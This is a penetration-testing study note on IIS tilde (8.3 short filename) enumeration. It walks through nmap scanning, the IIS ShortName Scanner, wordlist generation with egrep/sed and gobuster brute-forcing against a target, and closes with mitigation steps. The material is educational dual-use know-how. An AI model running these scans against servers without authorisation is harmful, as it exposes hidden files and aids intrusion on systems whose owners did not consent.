23.-IIS-tilde-enumeration

1. IIS Tilde Enumeration Concept

  • IIS generates 8.3 short file names for files and directories.

  • These short names can be accessed using the tilde (~) character in URLs.

  • This technique helps uncover hidden resources.

  • The 8.3 filename format consists of 8 characters, a period, and a 3-character extension.

    • Example: SecretDocuments becomes SECRET~1

    • Example file: somefile.txt becomes SOMEFI~1.TXT

  • If two files have similar names, the number after the tilde increments.

  • Affected Versions: IIS 5.0, IIS 6.0, IIS 7.0, IIS 7.5, IIS 8.0, IIS 8.5.

2. Enumeration Process

  1. Send HTTP requests with tilde and character combinations.

  2. Analyze server responses (200 OK indicates a valid short name).

  3. Iteratively refine the short name.

  4. Once the short name is found, access files within that directory.

3. Enumeration Commands and Tools

Nmap Port and Service Scan

nmap -p- -sV -sC --open <target_ip>

  • Scans all ports, performs service version detection, runs default scripts, and displays open ports.

IIS ShortName Scanner (Java)

java -jar iis_shortname_scanner.jar 0 5 http://<target_ip>/

  • Automates tilde enumeration.

  • Requires Java to be installed.

Wordlist Generation (egrep and sed)

egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt

  • Generates a wordlist from files containing the string transf.

Gobuster Directory Bruteforcing

gobuster dir -u http://<target_ip>/ -w /tmp/list.txt -x .aspx,.asp

  • Brute-forces directories and files using the generated wordlist and specified extensions.

4. Command Breakdown

Nmap:

  • -p- : Scan all ports.

  • -sV : Perform service version detection.

  • -sC : Run default scripts.

  • --open : Show only open ports.

IIS ShortName Scanner:

  • 0 : Start position.

  • 5 : Maximum length of short file name.

  • http://<target_ip>/ : Target URL.

egrep:

  • -r : Recursive search.

  • ^transf : Lines starting with "transf".

sed:

  • 's/^[^:]*://' : Remove text before the first colon.

Gobuster:

  • -u : Target URL.

  • -w : Wordlist file.

  • -x : File extensions.

5. Practical Example

Sample Enumeration Output:

200 OK - /SECRET~1
200 OK - /DOCUME~1/FILE.TXT
403 Forbidden - /ADMIN~1

This output suggests:

  • /SECRET~1 is a valid directory.

  • /DOCUME~1/FILE.TXT is an accessible file.

  • /ADMIN~1 exists but is restricted.

6. Mitigation Strategies

  • Disable 8.3 File Name Support:

    fsutil behavior set disable8dot3 1

  • Block tilde-based requests using URL Rewrite Rules in IIS.

  • Harden IIS configuration by restricting directory listings and permissions.

  • Regularly update IIS to mitigate known vulnerabilities.

7. Key Points

  • IIS tilde enumeration exploits a vulnerability in IIS's handling of short file names.

  • Tools like IIS ShortName Scanner and Gobuster automate the enumeration process.

  • Wordlists can be generated to target specific file names.

  • Nmap is used for initial port and service enumeration.

  • Java is required to run the IIS short name scanner.

  • Gobuster and wordlist generation help find the full file name from the 8.3 short file name.

  • Mitigation strategies should be implemented to prevent unauthorized access.

PreviousColdFusion Exploitation GuideNext24.Attacking-ldap

Last updated